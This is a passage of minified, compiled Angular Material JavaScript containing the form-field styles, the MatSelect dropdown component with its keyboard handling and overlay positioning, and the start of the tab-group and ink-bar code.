.mat-form-field-outline{opacity:0;transition:opacity 100ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-outline.mat-focused .mat-form-field-outline-thick,.mat-form-field-appearance-outline.mat-form-field-invalid .mat-form-field-outline-thick{opacity:1}.cdk-high-contrast-active .mat-form-field-appearance-outline.mat-focused .mat-form-field-outline-thick{border:3px dashed}.mat-form-field-appearance-outline:not(.mat-form-field-disabled) .mat-form-field-flex:hover .mat-form-field-outline{opacity:0;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-outline:not(.mat-form-field-disabled) .mat-form-field-flex:hover .mat-form-field-outline-thick{opacity:1}.mat-form-field-appearance-outline .mat-form-field-subscript-wrapper{padding:0 1em}.cdk-high-contrast-active .mat-form-field-appearance-outline.mat-form-field-disabled .mat-form-field-outline{color:GrayText}.mat-form-field-appearance-outline._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-outline,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-start,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-end,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-gap{transition:none}",".mat-form-field-appearance-standard .mat-form-field-flex{padding-top:.75em}.mat-form-field-appearance-standard .mat-form-field-underline{height:1px}.cdk-high-contrast-active .mat-form-field-appearance-standard .mat-form-field-underline{height:0;border-top:solid 1px}.mat-form-field-appearance-standard .mat-form-field-ripple{bottom:0;height:2px}.cdk-high-contrast-active .mat-form-field-appearance-standard .mat-form-field-ripple{height:0;border-top:solid 2px}.mat-form-field-appearance-standard.mat-form-field-disabled .mat-form-field-underline{background-position:0;background-color:rgba(0,0,0,0)}.cdk-high-contrast-active .mat-form-field-appearance-standard.mat-form-field-disabled .mat-form-field-underline{border-top-style:dotted;border-top-width:2px}.mat-form-field-appearance-standard:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{opacity:1;transform:none;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-standard._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{transition:none}"],encapsulation:2,data:{animation:[Ege.transitionMessages]},changeDetection:0}),t})(),r8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,$y,la]}),t})();const Sge=["trigger"],kge=["panel"];function Pge(t,a){if(1&t&&(m(0,"span",8),s(1),u()),2&t){const e=B();C(1),ke(e.placeholder)}}function Oge(t,a){if(1&t&&(m(0,"span",12),s(1),u()),2&t){const e=B(2);C(1),ke(e.triggerValue)}}function Nge(t,a){1&t&&va(0,0,["*ngSwitchCase","true"])}function Lge(t,a){1&t&&(m(0,"span",9),ne(1,Oge,2,1,"span",10),ne(2,Nge,1,0,"ng-content",11),u()),2&t&&(V("ngSwitch",!!B().customTrigger),C(2),V("ngSwitchCase",!0))}function zge(t,a){if(1&t){const e=Ye();m(0,"div",13)(1,"div",14,15),he("@transformPanel.done",function(n){return be(e),Me(B()._panelDoneAnimatingStream.next(n.toState))})("keydown",function(n){return be(e),Me(B()._handleKeydown(n))}),va(3,1),u()()}if(2&t){const e=B();V("@transformPanelWrap",void 0),C(1),Dv("mat-select-panel ",e._getPanelTheme(),""),ri("transform-origin",e._transformOrigin)("font-size",e._triggerFontSize,"px"),V("ngClass",e.panelClass)("@transformPanel",e.multiple?"showing-multiple":"showing"),Rt("id",e.id+"-panel")("aria-multiselectable",e.multiple)("aria-label",e.ariaLabel||null)("aria-labelledby",e._getPanelAriaLabelledby())}}const Wge=[[["mat-select-trigger"]],"*"],Fge=["mat-select-trigger","*"],pF={transformPanelWrap:ar("transformPanelWrap",[gn("* => void",c4("@transformPanel",[s4()],{optional:!0}))]),transformPanel:ar("transformPanel",[sn("void",zi({transform:"scaleY(0.8)",minWidth:"100%",opacity:0})),sn("showing",zi({opacity:1,minWidth:"calc(100% + 32px)",transform:"scaleY(1)"})),sn("showing-multiple",zi({opacity:1,minWidth:"calc(100% + 64px)",transform:"scaleY(1)"})),gn("void => *",En("120ms cubic-bezier(0, 0, 0.2, 1)")),gn("* => void",En("100ms 25ms linear",zi({opacity:0})))])};let _F=0;const CF=new ni("mat-select-scroll-strategy"),Uge=new ni("MAT_SELECT_CONFIG"),qge={provide:CF,deps:[vs],useFactory:function Hge(t){return()=>t.scrollStrategies.reposition()}};class Gge{constructor(a,e){this.source=a,this.value=e}}const jge=Dl(mp(Jc(Uw(class{constructor(t,a,e,i,n){this._elementRef=t,this._defaultErrorStateMatcher=a,this._parentForm=e,this._parentFormGroup=i,this.ngControl=n,this.stateChanges=new J}})))),yF=new ni("MatSelectTrigger");let Qge=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-select-trigger"]],features:[ki([{provide:yF,useExisting:t}])]}),t})(),$ge=(()=>{class t extends jge{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe,Re,Fe){var Ne,et,ut;super(c,r,T,k,Y),this._viewportRuler=e,this._changeDetectorRef=i,this._ngZone=n,this._dir=d,this._parentFormField=q,this._liveAnnouncer=Re,this._defaultOptions=Fe,this._panelOpen=!1,this._compareWith=(Ze,yt)=>Ze===yt,this._uid="mat-select-"+_F++,this._triggerAriaLabelledBy=null,this._destroy=new J,this._onChange=()=>{},this._onTouched=()=>{},this._valueId="mat-select-value-"+_F++,this._panelDoneAnimatingStream=new J,this._overlayPanelClass=(null===(Ne=this._defaultOptions)||void 0===Ne?void 0:Ne.overlayPanelClass)||"",this._focused=!1,this.controlType="mat-select",this._multiple=!1,this._disableOptionCentering=null!==(ut=null===(et=this._defaultOptions)||void 0===et?void 0:et.disableOptionCentering)&&void 0!==ut&&ut,this.ariaLabel="",this.optionSelectionChanges=sp(()=>{const Ze=this.options;return Ze?Ze.changes.pipe(Ro(Ze),Ur(()=>ra(...Ze.map(yt=>yt.onSelectionChange)))):this._ngZone.onStable.pipe(Cn(1),Ur(()=>this.optionSelectionChanges))}),this.openedChange=new Tt,this._openedStream=this.openedChange.pipe(Dn(Ze=>Ze),Xe(()=>{})),this._closedStream=this.openedChange.pipe(Dn(Ze=>!Ze),Xe(()=>{})),this.selectionChange=new Tt,this.valueChange=new Tt,this.ngControl&&(this.ngControl.valueAccessor=this),null!=(null==Fe?void 0:Fe.typeaheadDebounceInterval)&&(this._typeaheadDebounceInterval=Fe.typeaheadDebounceInterval),this._scrollStrategyFactory=pe,this._scrollStrategy=this._scrollStrategyFactory(),this.tabIndex=parseInt(te)||0,this.id=this.id}get focused(){return this._focused||this._panelOpen}get placeholder(){return this._placeholder}set placeholder(e){this._placeholder=e,this.stateChanges.next()}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Ad.required))&&void 0!==r&&r}set required(e){this._required=wi(e),this.stateChanges.next()}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e)}get disableOptionCentering(){return this._disableOptionCentering}set disableOptionCentering(e){this._disableOptionCentering=wi(e)}get compareWith(){return this._compareWith}set compareWith(e){this._compareWith=e,this._selectionModel&&this._initializeSelection()}get value(){return this._value}set value(e){this._assignValue(e)&&this._onChange(e)}get typeaheadDebounceInterval(){return this._typeaheadDebounceInterval}set typeaheadDebounceInterval(e){this._typeaheadDebounceInterval=Uo(e)}get id(){return this._id}set id(e){this._id=e||this._uid,this.stateChanges.next()}ngOnInit(){this._selectionModel=new I1(this.multiple),this.stateChanges.next(),this._panelDoneAnimatingStream.pipe(Bh(),ea(this._destroy)).subscribe(()=>this._panelDoneAnimating(this.panelOpen))}ngAfterContentInit(){this._initKeyManager(),this._selectionModel.changed.pipe(ea(this._destroy)).subscribe(e=>{e.added.forEach(i=>i.select()),e.removed.forEach(i=>i.deselect())}),this.options.changes.pipe(Ro(null),ea(this._destroy)).subscribe(()=>{this._resetOptions(),this._initializeSelection()})}ngDoCheck(){const e=this._getTriggerAriaLabelledby(),i=this.ngControl;if(e!==this._triggerAriaLabelledBy){const n=this._elementRef.nativeElement;this._triggerAriaLabelledBy=e,e?n.setAttribute("aria-labelledby",e):n.removeAttribute("aria-labelledby")}i&&(this._previousControl!==i.control&&(void 0!==this._previousControl&&null!==i.disabled&&i.disabled!==this.disabled&&(this.disabled=i.disabled),this._previousControl=i.control),this.updateErrorState())}ngOnChanges(e){(e.disabled||e.userAriaDescribedBy)&&this.stateChanges.next(),e.typeaheadDebounceInterval&&this._keyManager&&this._keyManager.withTypeAhead(this._typeaheadDebounceInterval)}ngOnDestroy(){this._destroy.next(),this._destroy.complete(),this.stateChanges.complete()}toggle(){this.panelOpen?this.close():this.open()}open(){this._canOpen()&&(this._panelOpen=!0,this._keyManager.withHorizontalOrientation(null),this._highlightCorrectOption(),this._changeDetectorRef.markForCheck())}close(){this._panelOpen&&(this._panelOpen=!1,this._keyManager.withHorizontalOrientation(this._isRtl()?"rtl":"ltr"),this._changeDetectorRef.markForCheck(),this._onTouched())}writeValue(e){this._assignValue(e)}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetectorRef.markForCheck(),this.stateChanges.next()}get panelOpen(){return this._panelOpen}get selected(){var e,i;return this.multiple?(null===(e=this._selectionModel)||void 0===e?void 0:e.selected)||[]:null===(i=this._selectionModel)||void 0===i?void 0:i.selected[0]}get triggerValue(){if(this.empty)return"";if(this._multiple){const e=this._selectionModel.selected.map(i=>i.viewValue);return this._isRtl()&&e.reverse(),e.join(", ")}return this._selectionModel.selected[0].viewValue}_isRtl(){return!!this._dir&&"rtl"===this._dir.value}_handleKeydown(e){this.disabled||(this.panelOpen?this._handleOpenKeydown(e):this._handleClosedKeydown(e))}_handleClosedKeydown(e){const i=e.keyCode,n=40===i||38===i||37===i||39===i,r=13===i||32===i,c=this._keyManager;if(!c.isTyping()&&r&&!Zr(e)||(this.multiple||e.altKey)&&n)e.preventDefault(),this.open();else if(!this.multiple){const d=this.selected;c.onKeydown(e);const T=this.selected;T&&d!==T&&this._liveAnnouncer.announce(T.viewValue,1e4)}}_handleOpenKeydown(e){const i=this._keyManager,n=e.keyCode,r=40===n||38===n,c=i.isTyping();if(r&&e.altKey)e.preventDefault(),this.close();else if(c||13!==n&&32!==n||!i.activeItem||Zr(e))if(!c&&this._multiple&&65===n&&e.ctrlKey){e.preventDefault();const d=this.options.some(T=>!T.disabled&&!T.selected);this.options.forEach(T=>{T.disabled||(d?T.select():T.deselect())})}else{const d=i.activeItemIndex;i.onKeydown(e),this._multiple&&r&&e.shiftKey&&i.activeItem&&i.activeItemIndex!==d&&i.activeItem._selectViaInteraction()}else e.preventDefault(),i.activeItem._selectViaInteraction()}_onFocus(){this.disabled||(this._focused=!0,this.stateChanges.next())}_onBlur(){this._focused=!1,!this.disabled&&!this.panelOpen&&(this._onTouched(),this._changeDetectorRef.markForCheck(),this.stateChanges.next())}_onAttached(){this._overlayDir.positionChange.pipe(Cn(1)).subscribe(()=>{this._changeDetectorRef.detectChanges(),this._positioningSettled()})}_getPanelTheme(){return this._parentFormField?`mat-${this._parentFormField.color}`:""}get empty(){return!this._selectionModel||this._selectionModel.isEmpty()}_initializeSelection(){Promise.resolve().then(()=>{this.ngControl&&(this._value=this.ngControl.value),this._setSelectionByValue(this._value),this.stateChanges.next()})}_setSelectionByValue(e){if(this._selectionModel.selected.forEach(i=>i.setInactiveStyles()),this._selectionModel.clear(),this.multiple&&e)Array.isArray(e),e.forEach(i=>this._selectOptionByValue(i)),this._sortValues();else{const i=this._selectOptionByValue(e);i?this._keyManager.updateActiveItem(i):this.panelOpen||this._keyManager.updateActiveItem(-1)}this._changeDetectorRef.markForCheck()}_selectOptionByValue(e){const i=this.options.find(n=>{if(this._selectionModel.isSelected(n))return!1;try{return null!=n.value&&this._compareWith(n.value,e)}catch(r){return!1}});return i&&this._selectionModel.select(i),i}_assignValue(e){return!!(e!==this._value||this._multiple&&Array.isArray(e))&&(this.options&&this._setSelectionByValue(e),this._value=e,!0)}_initKeyManager(){this._keyManager=new Bz(this.options).withTypeAhead(this._typeaheadDebounceInterval).withVerticalOrientation().withHorizontalOrientation(this._isRtl()?"rtl":"ltr").withHomeAndEnd().withAllowedModifierKeys(["shiftKey"]),this._keyManager.tabOut.pipe(ea(this._destroy)).subscribe(()=>{this.panelOpen&&(!this.multiple&&this._keyManager.activeItem&&this._keyManager.activeItem._selectViaInteraction(),this.focus(),this.close())}),this._keyManager.change.pipe(ea(this._destroy)).subscribe(()=>{this._panelOpen&&this.panel?this._scrollOptionIntoView(this._keyManager.activeItemIndex||0):!this._panelOpen&&!this.multiple&&this._keyManager.activeItem&&this._keyManager.activeItem._selectViaInteraction()})}_resetOptions(){const e=ra(this.options.changes,this._destroy);this.optionSelectionChanges.pipe(ea(e)).subscribe(i=>{this._onSelect(i.source,i.isUserInput),i.isUserInput&&!this.multiple&&this._panelOpen&&(this.close(),this.focus())}),ra(...this.options.map(i=>i._stateChanges)).pipe(ea(e)).subscribe(()=>{this._changeDetectorRef.markForCheck(),this.stateChanges.next()})}_onSelect(e,i){const n=this._selectionModel.isSelected(e);null!=e.value||this._multiple?(n!==e.selected&&(e.selected?this._selectionModel.select(e):this._selectionModel.deselect(e)),i&&this._keyManager.setActiveItem(e),this.multiple&&(this._sortValues(),i&&this.focus())):(e.deselect(),this._selectionModel.clear(),null!=this.value&&this._propagateChanges(e.value)),n!==this._selectionModel.isSelected(e)&&this._propagateChanges(),this.stateChanges.next()}_sortValues(){if(this.multiple){const e=this.options.toArray();this._selectionModel.sort((i,n)=>this.sortComparator?this.sortComparator(i,n,e):e.indexOf(i)-e.indexOf(n)),this.stateChanges.next()}}_propagateChanges(e){let i=null;i=this.multiple?this.selected.map(n=>n.value):this.selected?this.selected.value:e,this._value=i,this.valueChange.emit(i),this._onChange(i),this.selectionChange.emit(this._getChangeEvent(i)),this._changeDetectorRef.markForCheck()}_highlightCorrectOption(){this._keyManager&&(this.empty?this._keyManager.setFirstItemActive():this._keyManager.setActiveItem(this._selectionModel.selected[0]))}_canOpen(){var e;return!this._panelOpen&&!this.disabled&&(null===(e=this.options)||void 0===e?void 0:e.length)>0}focus(e){this._elementRef.nativeElement.focus(e)}_getPanelAriaLabelledby(){var e;if(this.ariaLabel)return null;const i=null===(e=this._parentFormField)||void 0===e?void 0:e.getLabelId();return this.ariaLabelledby?(i?i+" ":"")+this.ariaLabelledby:i}_getAriaActiveDescendant(){return this.panelOpen&&this._keyManager&&this._keyManager.activeItem?this._keyManager.activeItem.id:null}_getTriggerAriaLabelledby(){var e;if(this.ariaLabel)return null;const i=null===(e=this._parentFormField)||void 0===e?void 0:e.getLabelId();let n=(i?i+" ":"")+this._valueId;return this.ariaLabelledby&&(n+=" "+this.ariaLabelledby),n}_panelDoneAnimating(e){this.openedChange.emit(e)}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}onContainerClick(){this.focus(),this.open()}get shouldLabelFloat(){return this._panelOpen||!this.empty||this._focused&&!!this._placeholder}}return t.\u0275fac=function(e){return new(e||t)(Ee(bm),Ee(Ma),Ee(qi),Ee(up),Ee(mi),Ee(Cr,8),Ee(y1,8),Ee(dg,8),Ee(cb,8),Ee(fm,10),Vr("tabindex"),Ee(CF),Ee(Nw),Ee(Uge,8))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(Sge,5),Mi(kge,5),Mi(i8,5)),2&e){let n;Vt(n=Bt())&&(i.trigger=n.first),Vt(n=Bt())&&(i.panel=n.first),Vt(n=Bt())&&(i._overlayDir=n.first)}},inputs:{userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],panelClass:"panelClass",placeholder:"placeholder",required:"required",multiple:"multiple",disableOptionCentering:"disableOptionCentering",compareWith:"compareWith",value:"value",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],errorStateMatcher:"errorStateMatcher",typeaheadDebounceInterval:"typeaheadDebounceInterval",sortComparator:"sortComparator",id:"id"},outputs:{openedChange:"openedChange",_openedStream:"opened",_closedStream:"closed",selectionChange:"selectionChange",valueChange:"valueChange"},features:[ci,sa]}),t})(),Nr=(()=>{class t extends $ge{constructor(){super(...arguments),this._scrollTop=0,this._triggerFontSize=0,this._transformOrigin="top",this._offsetY=0,this._positions=[{originX:"start",originY:"top",overlayX:"start",overlayY:"top"},{originX:"start",originY:"bottom",overlayX:"start",overlayY:"bottom"}]}_calculateOverlayScroll(e,i,n){const r=this._getItemHeight();return Math.min(Math.max(0,r*e-i+r/2),n)}ngOnInit(){super.ngOnInit(),this._viewportRuler.change().pipe(ea(this._destroy)).subscribe(()=>{this.panelOpen&&(this._triggerRect=this.trigger.nativeElement.getBoundingClientRect(),this._changeDetectorRef.markForCheck())})}open(){super._canOpen()&&(super.open(),this._triggerRect=this.trigger.nativeElement.getBoundingClientRect(),this._triggerFontSize=parseInt(getComputedStyle(this.trigger.nativeElement).fontSize||"0"),this._calculateOverlayPosition(),this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this._triggerFontSize&&this._overlayDir.overlayRef&&this._overlayDir.overlayRef.overlayElement&&(this._overlayDir.overlayRef.overlayElement.style.fontSize=`${this._triggerFontSize}px`)}))}_scrollOptionIntoView(e){const i=$w(e,this.options,this.optionGroups),n=this._getItemHeight();this.panel.nativeElement.scrollTop=0===e&&1===i?0:RW((e+i)*n,n,this.panel.nativeElement.scrollTop,256)}_positioningSettled(){this._calculateOverlayOffsetX(),this.panel.nativeElement.scrollTop=this._scrollTop}_panelDoneAnimating(e){this.panelOpen?this._scrollTop=0:(this._overlayDir.offsetX=0,this._changeDetectorRef.markForCheck()),super._panelDoneAnimating(e)}_getChangeEvent(e){return new Gge(this,e)}_calculateOverlayOffsetX(){const e=this._overlayDir.overlayRef.overlayElement.getBoundingClientRect(),i=this._viewportRuler.getViewportSize(),n=this._isRtl(),r=this.multiple?56:32;let c;if(this.multiple)c=40;else if(this.disableOptionCentering)c=16;else{let k=this._selectionModel.selected[0]||this.options.first;c=k&&k.group?32:16}n||(c*=-1);const d=0-(e.left+c-(n?r:0)),T=e.right+c-i.width+(n?0:r);d>0?c+=d+8:T>0&&(c-=T+8),this._overlayDir.offsetX=Math.round(c),this._overlayDir.overlayRef.updatePosition()}_calculateOverlayOffsetY(e,i,n){const r=this._getItemHeight(),c=(r-this._triggerRect.height)/2,d=Math.floor(256/r);let T;return this.disableOptionCentering?0:(T=0===this._scrollTop?e*r:this._scrollTop===n?(e-(this._getItemCount()-d))*r+(r-(this._getItemCount()*r-256)%r):i-r/2,Math.round(-1*T-c))}_checkOverlayWithinViewport(e){const i=this._getItemHeight(),n=this._viewportRuler.getViewportSize(),r=this._triggerRect.top-8,c=n.height-this._triggerRect.bottom-8,d=Math.abs(this._offsetY),k=Math.min(this._getItemCount()*i,256)-d-this._triggerRect.height;k>c?this._adjustPanelUp(k,c):d>r?this._adjustPanelDown(d,r,e):this._transformOrigin=this._getOriginBasedOnOption()}_adjustPanelUp(e,i){const n=Math.round(e-i);this._scrollTop-=n,this._offsetY-=n,this._transformOrigin=this._getOriginBasedOnOption(),this._scrollTop<=0&&(this._scrollTop=0,this._offsetY=0,this._transformOrigin="50% bottom 0px")}_adjustPanelDown(e,i,n){const r=Math.round(e-i);if(this._scrollTop+=r,this._offsetY+=r,this._transformOrigin=this._getOriginBasedOnOption(),this._scrollTop>=n)return this._scrollTop=n,this._offsetY=0,void(this._transformOrigin="50% top 0px")}_calculateOverlayPosition(){const e=this._getItemHeight(),i=this._getItemCount(),n=Math.min(i*e,256),c=i*e-n;let d;d=this.empty?0:Math.max(this.options.toArray().indexOf(this._selectionModel.selected[0]),0),d+=$w(d,this.options,this.optionGroups);const T=n/2;this._scrollTop=this._calculateOverlayScroll(d,T,c),this._offsetY=this._calculateOverlayOffsetY(d,T,c),this._checkOverlayWithinViewport(c)}_getOriginBasedOnOption(){const e=this._getItemHeight(),i=(e-this._triggerRect.height)/2;return`50% ${Math.abs(this._offsetY)-i+e/2}px 0px`}_getItemHeight(){return 3*this._triggerFontSize}_getItemCount(){return this.options.length+this.optionGroups.length}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-select"]],contentQueries:function(e,i,n){if(1&e&&(ha(n,yF,5),ha(n,yr,5),ha(n,j3,5)),2&e){let r;Vt(r=Bt())&&(i.customTrigger=r.first),Vt(r=Bt())&&(i.options=r),Vt(r=Bt())&&(i.optionGroups=r)}},hostAttrs:["role","combobox","aria-autocomplete","none","aria-haspopup","true",1,"mat-select"],hostVars:19,hostBindings:function(e,i){1&e&&he("keydown",function(r){return i._handleKeydown(r)})("focus",function(){return i._onFocus()})("blur",function(){return i._onBlur()}),2&e&&(Rt("id",i.id)("tabindex",i.tabIndex)("aria-controls",i.panelOpen?i.id+"-panel":null)("aria-expanded",i.panelOpen)("aria-label",i.ariaLabel||null)("aria-required",i.required.toString())("aria-disabled",i.disabled.toString())("aria-invalid",i.errorState)("aria-activedescendant",i._getAriaActiveDescendant()),Ct("mat-select-disabled",i.disabled)("mat-select-invalid",i.errorState)("mat-select-required",i.required)("mat-select-empty",i.empty)("mat-select-multiple",i.multiple))},inputs:{disabled:"disabled",disableRipple:"disableRipple",tabIndex:"tabIndex"},exportAs:["matSelect"],features:[ki([{provide:sb,useExisting:t},{provide:G3,useExisting:t}]),ci],ngContentSelectors:Fge,decls:9,vars:12,consts:[["cdk-overlay-origin","",1,"mat-select-trigger",3,"click"],["origin","cdkOverlayOrigin","trigger",""],[1,"mat-select-value",3,"ngSwitch"],["class","mat-select-placeholder mat-select-min-line",4,"ngSwitchCase"],["class","mat-select-value-text",3,"ngSwitch",4,"ngSwitchCase"],[1,"mat-select-arrow-wrapper"],[1,"mat-select-arrow"],["cdk-connected-overlay","","cdkConnectedOverlayLockPosition","","cdkConnectedOverlayHasBackdrop","","cdkConnectedOverlayBackdropClass","cdk-overlay-transparent-backdrop",3,"cdkConnectedOverlayPanelClass","cdkConnectedOverlayScrollStrategy","cdkConnectedOverlayOrigin","cdkConnectedOverlayOpen","cdkConnectedOverlayPositions","cdkConnectedOverlayMinWidth","cdkConnectedOverlayOffsetY","backdropClick","attach","detach"],[1,"mat-select-placeholder","mat-select-min-line"],[1,"mat-select-value-text",3,"ngSwitch"],["class","mat-select-min-line",4,"ngSwitchDefault"],[4,"ngSwitchCase"],[1,"mat-select-min-line"],[1,"mat-select-panel-wrap"],["role","listbox","tabindex","-1",3,"ngClass","keydown"],["panel",""]],template:function(e,i){if(1&e&&(Jn(Wge),m(0,"div",0,1),he("click",function(){return i.toggle()}),m(3,"div",2),ne(4,Pge,2,1,"span",3),ne(5,Lge,3,2,"span",4),u(),m(6,"div",5),it(7,"div",6),u()(),ne(8,zge,4,14,"ng-template",7),he("backdropClick",function(){return i.close()})("attach",function(){return i._onAttached()})("detach",function(){return i.close()})),2&e){const n=Ti(1);Rt("aria-owns",i.panelOpen?i.id+"-panel":null),C(3),V("ngSwitch",i.empty),Rt("id",i._valueId),C(1),V("ngSwitchCase",!0),C(1),V("ngSwitchCase",!1),C(3),V("cdkConnectedOverlayPanelClass",i._overlayPanelClass)("cdkConnectedOverlayScrollStrategy",i._scrollStrategy)("cdkConnectedOverlayOrigin",n)("cdkConnectedOverlayOpen",i.panelOpen)("cdkConnectedOverlayPositions",i._positions)("cdkConnectedOverlayMinWidth",null==i._triggerRect?null:i._triggerRect.width)("cdkConnectedOverlayOffsetY",i._offsetY)}},dependencies:[ag,Zf,p1,d6,i8,t8],styles:['.mat-select{display:inline-block;width:100%;outline:none}.mat-select-trigger{display:inline-flex;align-items:center;cursor:pointer;position:relative;box-sizing:border-box;width:100%}.mat-select-disabled .mat-select-trigger{-webkit-user-select:none;user-select:none;cursor:default}.mat-select-value{width:100%;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.mat-select-value-text{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.mat-select-arrow-wrapper{height:16px;flex-shrink:0;display:inline-flex;align-items:center}.mat-form-field-appearance-fill .mat-select-arrow-wrapper{transform:translateY(-50%)}.mat-form-field-appearance-outline .mat-select-arrow-wrapper{transform:translateY(-25%)}.mat-form-field-appearance-standard.mat-form-field-has-label .mat-select:not(.mat-select-empty) .mat-select-arrow-wrapper{transform:translateY(-50%)}.mat-form-field-appearance-standard .mat-select.mat-select-empty .mat-select-arrow-wrapper{transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}._mat-animation-noopable.mat-form-field-appearance-standard .mat-select.mat-select-empty .mat-select-arrow-wrapper{transition:none}.mat-select-arrow{width:0;height:0;border-left:5px solid rgba(0,0,0,0);border-right:5px solid rgba(0,0,0,0);border-top:5px solid;margin:0 4px}.mat-form-field.mat-focused .mat-select-arrow{transform:translateX(0)}.mat-select-panel-wrap{flex-basis:100%}.mat-select-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;padding-top:0;padding-bottom:0;max-height:256px;min-width:100%;border-radius:4px;outline:0}.cdk-high-contrast-active .mat-select-panel{outline:solid 1px}.mat-select-panel .mat-optgroup-label,.mat-select-panel .mat-option{font-size:inherit;line-height:3em;height:3em}.mat-form-field-type-mat-select:not(.mat-form-field-disabled) .mat-form-field-flex{cursor:pointer}.mat-form-field-type-mat-select .mat-form-field-label{width:calc(100% - 18px)}.mat-select-placeholder{transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}._mat-animation-noopable .mat-select-placeholder{transition:none}.mat-form-field-hide-placeholder .mat-select-placeholder{color:rgba(0,0,0,0);-webkit-text-fill-color:rgba(0,0,0,0);transition:none;display:block}.mat-select-min-line:empty::before{content:" ";white-space:pre;width:1px;display:inline-block;visibility:hidden}'],encapsulation:2,data:{animation:[pF.transformPanelWrap,pF.transformPanel]},changeDetection:0}),t})(),s8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[qge],imports:[rn,bu,Q3,la,uu,r8,Q3,la]}),t})();function Kge(t,a){1&t&&va(0)}const bF=["*"];function Xge(t,a){}const Yge=function(t){return{animationDuration:t}},Jge=function(t,a){return{value:t,params:a}},Zge=["tabListContainer"],e0e=["tabList"],t0e=["tabListInner"],i0e=["nextPaginator"],a0e=["previousPaginator"],n0e=["tabBodyWrapper"],o0e=["tabHeader"];function r0e(t,a){}function s0e(t,a){1&t&&ne(0,r0e,0,0,"ng-template",10),2&t&&V("cdkPortalOutlet",B().$implicit.templateLabel)}function c0e(t,a){1&t&&s(0),2&t&&ke(B().$implicit.textLabel)}function l0e(t,a){if(1&t){const e=Ye();m(0,"div",6),he("click",function(){const n=be(e),r=n.$implicit,c=n.index,d=B(),T=Ti(1);return Me(d._handleClick(r,T,c))})("cdkFocusChange",function(n){const c=be(e).index;return Me(B()._tabFocusChanged(n,c))}),m(1,"div",7),ne(2,s0e,1,1,"ng-template",8),ne(3,c0e,1,1,"ng-template",null,9,d1),u()()}if(2&t){const e=a.$implicit,i=a.index,n=Ti(4),r=B();Ct("mat-tab-label-active",r.selectedIndex===i),V("id",r._getTabLabelId(i))("ngClass",e.labelClass)("disabled",e.disabled)("matRippleDisabled",e.disabled||r.disableRipple),Rt("tabIndex",r._getTabIndex(e,i))("aria-posinset",i+1)("aria-setsize",r._tabs.length)("aria-controls",r._getTabContentId(i))("aria-selected",r.selectedIndex===i)("aria-label",e.ariaLabel||null)("aria-labelledby",!e.ariaLabel&&e.ariaLabelledby?e.ariaLabelledby:null),C(2),V("ngIf",e.templateLabel)("ngIfElse",n)}}function d0e(t,a){if(1&t){const e=Ye();m(0,"mat-tab-body",11),he("_onCentered",function(){return be(e),Me(B()._removeTabBodyWrapperHeight())})("_onCentering",function(n){return be(e),Me(B()._setTabBodyWrapperHeight(n))}),u()}if(2&t){const e=a.$implicit,i=a.index,n=B();Ct("mat-tab-body-active",n.selectedIndex===i),V("id",n._getTabContentId(i))("ngClass",e.bodyClass)("content",e.content)("position",e.position)("origin",e.origin)("animationDuration",n.animationDuration)("preserveContent",n.preserveContent),Rt("tabindex",null!=n.contentTabIndex&&n.selectedIndex===i?n.contentTabIndex:null)("aria-labelledby",n._getTabLabelId(i))}}const m0e=new ni("MatInkBarPositioner",{providedIn:"root",factory:function u0e(){return a=>({left:a?(a.offsetLeft||0)+"px":"0",width:a?(a.offsetWidth||0)+"px":"0"})}});let MF=(()=>{class t{constructor(e,i,n,r){this._elementRef=e,this._ngZone=i,this._inkBarPositioner=n,this._animationMode=r}alignToElement(e){this.show(),this._ngZone.run(()=>{this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{const i=this._inkBarPositioner(e),n=this._elementRef.nativeElement;n.style.left=i.left,n.style.width=i.width})})}show(){this._elementRef.nativeElement.style.visibility="visible"}hide(){this._elementRef.nativeElement.style.visibility="hidden"}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(m0e),Ee(ir,8))},t.\u0275dir=Ot({type:t,selectors:[["mat-ink-bar"]],hostAttrs:[1,"mat-ink-bar"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("_mat-animation-noopable","NoopAnimations"===i._animationMode)}}),t})();const 